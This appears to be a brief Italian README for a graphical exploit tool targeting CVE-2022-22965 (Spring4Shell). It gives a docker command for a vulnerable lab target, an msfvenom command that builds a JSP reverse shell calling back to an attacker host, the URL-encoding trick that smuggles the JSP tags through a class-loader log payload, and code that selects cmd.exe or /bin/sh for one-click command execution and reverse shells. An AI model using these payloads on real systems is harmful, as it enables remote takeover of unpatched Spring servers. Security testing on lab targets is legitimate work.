
CVE-2022-22965 strumento di rilevamento grafico
Target
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
La reverse shell si basa essenzialmente su msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
Dopo aver codificato il JSP in URL, utilizzare
%3C%25 sostituisce %25%7Bc2%7Di rappresenta <%
%25%3E sostituisce %25%7Bsuffix%7Di rappresenta %>
Il codice modifica il shellpath in base al tipo di server:
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
Esecuzione del comando:
Rilevamento whoami:
Reverse shell con un clic
